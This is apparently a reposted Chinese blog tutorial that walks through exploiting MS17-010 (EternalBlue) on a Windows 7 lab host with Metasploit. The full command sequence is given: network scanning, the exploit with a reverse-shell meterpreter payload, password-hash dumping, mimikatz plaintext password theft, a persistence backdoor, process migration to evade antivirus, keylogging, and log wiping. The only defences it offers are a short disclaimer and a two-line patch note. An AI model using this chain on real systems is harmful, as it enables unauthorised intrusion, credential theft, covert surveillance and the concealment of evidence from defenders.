当前位置:   article > 正文

版本永恒之蓝_永恒之蓝漏洞利用

永恒之蓝 键盘监听

#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为


永恒之蓝漏洞利用

实验环境

客户机(win7 ip:192.168.0.105)

攻击机(kali ip:192.168.0.101)

具体步骤

查看局域网设备

使用netdiscover 查看局域网的设备

95daba58f7249aac22a599109b32e978.png

如上图所示,搜索到了一台IP为192.168.0.103的设备

使用 nmap 扫描

root@WHOAMI:~# nmap -sS -A -p- -v -O 192.168.0.103

-sS 半开扫描

-A 全面系统检测、启用脚本检测、扫描等

-p- 扫描全部开放的端口

-v 显示扫描过程,

-O 启用远程操作系统检测,存在误报

扫描结果如下图

fc00bbb44def07e5aa5c7f320da0ac13.png
82a27477c1d0bbc67480a49b25e15c66.png

发现目标机器开放的端口还有Windows 7操作系统

对主机进行扫描确认是否存在漏洞

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.0.103

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

4873b08791396732deb834bb279dfc5f.png

上图中出现- Host is likely VULNERABLE to MS17-010!说明客户机存在MS17-010漏洞下面开始漏洞利用

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.103

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

b18468e39f360b8302deecba2a2aeb73.png

连接成功

c8aea11f31cb10a56bc43ccc300b3f2e.png

查看权限

meterpreter > getuid

6afa5eac2029398b4f96b158672443bb.png

查看登录的用户的明文密码

使用命令 run hashdump 加载 hashdump 模块

e7f8769b661bd6b1c6ea2628e1d0462a.png

使用命令 load mimikatz 加载 mimikatz 模块,再使用 help mimikatz

77d2845fd7137369ae42f07028fcf958.png

使用 wdigest 命令获取登录过的用户储存在内存里的明文密码

a7997d460d644a4f39f52e7d6ca0bfa7.png

查看分区

run post/windows/gather/forensics/enum_drives

37b1bae3c2e89297008444223deaf31c.png

查看补丁信息

67ff885931383a59cd2cdb0c1ee95843.png

给 win7 留后门

使用命令 run persistence -X -i 10 -r 192.168.0.101 -p 444

887f7bdf8d4e085831c9af4f756e4c70.png

再开启一个 msf

加载 handler 模块

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.0.101

msf5 exploit(multi/handler) > set LPORT 444

msf5 exploit(multi/handler) > run

如下图成功在444端口监听到一个会话

6ebcc241d5c29c20e199d262eb0bfcb2.png

Metasploit 键盘记录

ps查看进程

af8acac27d39957894d56874146ed400.png

将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀毒软件

653fc58e3bbb6ba18440358e34f07227.png

最后,我们启动键盘记录器,等待一段时间并转储输出。

ee659464d6ca66fe9c1f9e9857c11c1c.png

清除痕迹

在渗透入侵的过程中难免会留下一下日志信息痕迹,我们可以使用此命令来擦除留下的痕迹

使用clearev

3637e1bf0da3bfd77f1b583c7851bb05.png

解决措施

·及时打补丁

·安装杀毒软件自动更新补丁


#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/848199
推荐阅读
相关标签
  

闽ICP备14008679号